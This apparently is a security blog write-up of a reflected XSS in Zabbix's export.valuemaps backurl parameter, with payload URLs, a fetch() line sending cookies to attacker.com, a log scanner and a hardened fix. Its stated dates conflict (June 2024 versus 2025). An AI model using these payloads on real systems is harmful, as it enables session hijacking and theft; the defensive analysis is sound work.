CVE-2024-45699 - Exploiting XSS in Zabbix /zabbix.php?action=export.valuemaps via the `backurl` Parameter
Published: June 2024
Author: [Your Alias]
Introduction
A vulnerability, CVE-2024-45699, has been disclosed in Zabbix, the open-source monitoring platform widely used by enterprises and sysadmins. It is a reflected cross-site scripting (XSS) bug: the frontend endpoint /zabbix.php?action=export.valuemaps echoes the backurl query parameter into the page without validating or encoding it, so an attacker who gets a victim to open a crafted URL can run arbitrary JavaScript in that victim's browser, inside the Zabbix frontend's origin. In this post we explain the issue in simple terms, show a simplified model of the vulnerable behaviour, walk through exploitation, and point you to official references.
What Is the Vulnerability?
The crux of CVE-2024-45699 is a reflected Cross-Site Scripting (XSS) vulnerability. Specifically, it affects the backurl query parameter on the endpoint:
/zabbix.php?action=export.valuemaps
If a user opens this endpoint with a malicious backurl value, that value is reflected into the HTML response *without* validation or output encoding. An attacker can therefore inject markup and JavaScript that the victim's browser executes as if it came from the Zabbix frontend.
Vulnerable Code Walkthrough
Let's break it down. Imagine the vulnerable PHP block looks something like this (a simplified illustration of the bug, not Zabbix's actual source):
```php
<?php
// zabbix.php receives the GET parameter 'backurl' ...
$backurl = $_GET['backurl'] ?? '';
// ... and interpolates it, unvalidated and unescaped, straight into an href attribute.
echo "<a href='$backurl'>Back</a>";
?>
```
If the server just pastes whatever the user supplies for backurl directly into an HTML attribute, that’s a serious problem. If an attacker sends:
```
/zabbix.php?action=export.valuemaps&backurl=javascript:alert(1)
```
the rendered link becomes
```html
<a href='javascript:alert(1)'>Back</a>
```
and the script runs as soon as the victim clicks "Back". Worse, with input that closes the attribute early
```
/zabbix.php?action=export.valuemaps&backurl=' onmouseover='alert(1)
```
(the quotes and the space must be URL-encoded when the link is actually sent), the HTML output is
```html
<a href='' onmouseover='alert(1)'>Back</a>
```
Now merely hovering over the link triggers the payload; no click is needed.
A proof-of-concept URL against a target:
```
https://target/zabbix.php?action=export.valuemaps&backurl=javascript:alert('XSSed!')
```
Result:
The injected script runs in the origin of the Zabbix frontend. It can read the page DOM, read any cookie that is not flagged HttpOnly, and send requests that the browser automatically authenticates with the victim's session (reading any anti-CSRF token out of the page first), so the attacker can act as the victim.
Here is a simple JavaScript payload
```
javascript:alert('Hacked by CVE-2024-45699!')
```
Malicious URL Example
```
https://zabbix.example.com/zabbix.php?action=export.valuemaps&backurl=javascript:alert('Hacked by CVE-2024-45699!')
```
Or a payload that exfiltrates the victim's cookies to an attacker-controlled host. Note the caveat: document.cookie only exposes cookies without the HttpOnly flag, so if the session cookie is protected the attacker instead drives the application with fetch() from inside the page, where the browser attaches the session for them.
```
https://zabbix.example.com/zabbix.php?action=export.valuemaps&backurl=javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)
```
Impact
- Session hijacking: cookies readable from script are exfiltrated; even with HttpOnly set, the script can issue authenticated requests on the victim's behalf.
- Phishing: the attacker injects a fake login form into a page the victim already trusts.
- Data manipulation: any action the victim can perform, the attacker can trigger via injected script.
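Before patching, a defender will want to know whether the endpoint has already been probed. The following is an added example, not from the original post, of a small Python scanner over web-server access logs in combined format: it decodes the query string once (as PHP's $_GET does) and flags any request whose backurl carries a script-capable scheme, attribute-breakout characters, or an off-site target. The log lines are constructed for the example and the classification rules are assumptions to tune for your traffic.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in combined format (not real traffic):
# one legitimate use of backurl, three probes of the kind shown in the post,
# and an unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Apr/2025:07:15:41 +0000] "GET /zabbix.php?action=export.valuemaps&backurl=zabbix.php%3Faction%3Dvaluemap.list HTTP/1.1" 200 1822 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Apr/2025:07:16:02 +0000] "GET /zabbix.php?action=export.valuemaps&backurl=javascript:alert(1) HTTP/1.1" 200 1822 "-" "curl/8.4.0"
203.0.113.9 - - [02/Apr/2025:07:16:10 +0000] "GET /zabbix.php?action=export.valuemaps&backurl=%27%20onmouseover%3D%27alert(1) HTTP/1.1" 200 1822 "-" "curl/8.4.0"
203.0.113.9 - - [02/Apr/2025:07:16:33 +0000] "GET /zabbix.php?action=export.valuemaps&backurl=JaVa%09ScRiPt%3Afetch(%27https%3A%2F%2Fattacker.example%2Fsteal%3Fcookie%3D%27%2Bdocument.cookie) HTTP/1.1" 200 1822 "-" "curl/8.4.0"
10.0.0.7 - - [02/Apr/2025:07:17:00 +0000] "GET /zabbix.php?action=dashboard.view HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def classify_backurl(value: str) -> Optional[str]:
    """Return why a decoded backurl value looks like an XSS/redirect probe, else None."""
    # Browsers ignore tabs and newlines inside a scheme ("java\tscript:"),
    # so strip control characters and whitespace before matching the scheme.
    compact = re.sub(r"[\x00-\x20]", "", value).lower()
    if compact.startswith(("javascript:", "data:", "vbscript:")):
        return "script-capable URL scheme"
    if re.search(r"""['"<>]""", value):
        return "attribute/tag breakout characters"
    if compact.startswith("//") or urlsplit(value).netloc:
        return "off-site target"
    return None


def scan(log_text: str) -> List[Dict[str, str]]:
    """Flag every request carrying a suspicious backurl, whatever the action."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # parse_qs decodes percent-encoding exactly once, matching what PHP sees.
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for raw in params.get("backurl", []):
            reason = classify_backurl(raw)
            if reason:
                hits.append({
                    "ip": m["ip"],
                    "ts": m["ts"],
                    "status": m["status"],
                    "action": params.get("action", ["-"])[0],
                    "backurl": raw,
                    "reason": reason,
                })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['status']} action={hit['action']} "
              f"reason={hit['reason']} backurl={hit['backurl']!r}")
```

A 200 response to a flagged request tells you the frontend served the reflected page, not that a victim ever opened the link; correlate the offending backurl with later authenticated activity from the victim's session to tell a scan from a successful phish.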
Fixing the bug
Output encoding is necessary but not sufficient here. htmlspecialchars() stops the quote breakout, but javascript:alert(1) contains no character it touches, so an escaped javascript: URL still executes on click. The value must also be validated before it is echoed: accept only a relative path inside the Zabbix frontend, fall back to a known page otherwise, and then encode for the attribute context.
```php
<?php
$backurl = $_GET['backurl'] ?? '';
// Allowlist first: relative path, conservative characters, no ':' (so no scheme)
// and no protocol-relative //host form; anything else goes to a safe default page.
if (!preg_match('#^[A-Za-z0-9_./?&=%-]+$#', $backurl) || strncmp($backurl, '//', 2) === 0) {
    $backurl = 'zabbix.php?action=dashboard.view';
}
?>
<a href="<?php echo htmlspecialchars($backurl, ENT_QUOTES, 'UTF-8'); ?>">Back</a>
```
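To make the point from the walkthrough and the fix concrete, here is an added Python model (example code, not Zabbix's source) of three renderers side by side: the raw interpolation from the vulnerable snippet, output encoding alone, and validation followed by encoding. It runs the page's two payloads plus a benign value through each and uses a small oracle to decide whether the resulting anchor would still run script, showing that escaping blocks only the quote breakout while the scheme/path allowlist blocks the javascript: form as well. The allowlist pattern and the fallback page are assumptions.

```python
import html
import re
from urllib.parse import urlsplit

# Probe values: the two from the walkthrough and a benign value (constructed).
PAYLOADS = {
    "benign": "zabbix.php?action=valuemap.list",
    "scheme": "javascript:alert(1)",
    "breakout": "' onmouseover='alert(1)",
}

# Hypothetical allowlist: a relative path using a conservative character set.
# It deliberately excludes ':' (no scheme), whitespace, quotes and angle brackets.
_SAFE_PATH = re.compile(r"[A-Za-z0-9_./?&=%-]+")
FALLBACK = "zabbix.php?action=dashboard.view"  # assumed safe default page


def render_vulnerable(backurl: str) -> str:
    """Mirror of the page's vulnerable snippet: raw interpolation into href."""
    return f"<a href='{backurl}'>Back</a>"


def render_escape_only(backurl: str) -> str:
    """Output encoding alone (the htmlspecialchars equivalent)."""
    return f'<a href="{html.escape(backurl, quote=True)}">Back</a>'


def is_safe_backurl(backurl: str) -> bool:
    """True only for a same-origin relative path."""
    if not backurl or any(ord(c) < 0x20 or ord(c) == 0x7F for c in backurl):
        return False  # control characters: browsers strip them ("java\tscript:")
    parts = urlsplit(backurl)
    if parts.scheme or parts.netloc or backurl.startswith(("//", "/\\", "\\")):
        return False  # any scheme (javascript:, data:, https:) or a //host form
    return _SAFE_PATH.fullmatch(backurl) is not None


def render_hardened(backurl: str) -> str:
    """Validate first, then encode for the attribute context."""
    target = backurl if is_safe_backurl(backurl) else FALLBACK
    return f'<a href="{html.escape(target, quote=True)}">Back</a>'


def executes_script(anchor_html: str) -> bool:
    """Crude oracle: would this anchor run attacker script on click or hover?
    True if the href has a javascript: scheme, or an on*= attribute appears
    outside the href value (i.e. the attribute was broken out of)."""
    m = re.search(r"""href=(['"])(.*?)\1""", anchor_html)
    href = html.unescape(m.group(2)) if m else ""
    outside_href = anchor_html[:m.start()] + anchor_html[m.end():] if m else anchor_html
    scheme_is_js = re.sub(r"\s", "", href).lower().startswith("javascript:")
    return scheme_is_js or re.search(r"\son\w+=", outside_href) is not None


def evaluate() -> dict:
    """For each payload, which renderers still yield an executable anchor."""
    renderers = {
        "vulnerable": render_vulnerable,
        "escape_only": render_escape_only,
        "hardened": render_hardened,
    }
    return {
        name: {rn: executes_script(fn(value)) for rn, fn in renderers.items()}
        for name, value in PAYLOADS.items()
    }


if __name__ == "__main__":
    for name, value in PAYLOADS.items():
        print(f"[{name}] {value!r}")
        print("  vulnerable :", render_vulnerable(value))
        print("  escape_only:", render_escape_only(value))
        print("  hardened   :", render_hardened(value))
    print(evaluate())
```

The allowlist is intentionally stricter than a generic URL parser: it rejects anything with a scheme or host rather than trying to enumerate bad schemes, because the next bypass (mixed case, embedded tabs, data:) is always one character away from a denylist.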
Official References
- Zabbix Official Security Advisory _(example/placeholder)_
- CVE Details for CVE-2024-45699
- OWASP XSS Guide
Conclusion
CVE-2024-45699 is a classic but impactful reflected XSS, dangerous because Zabbix frontends are used by administrators with broad privileges and because a "Back" link is exactly the kind of thing a busy admin clicks without looking. Anyone managing a Zabbix instance should update to a release that fixes it and review how every reflected parameter is validated and encoded across the UI. As always: validate input against an allowlist and encode output for the context it lands in; for a URL parameter that means checking the scheme and host, not just escaping quotes. Stay secure!
*You can share questions or thoughts below. For more deep dives and exclusive content, follow this blog!*
Timeline
Published on: 04/02/2025 07:15:41 UTC
Last modified on: 04/02/2025 14:58:07 UTC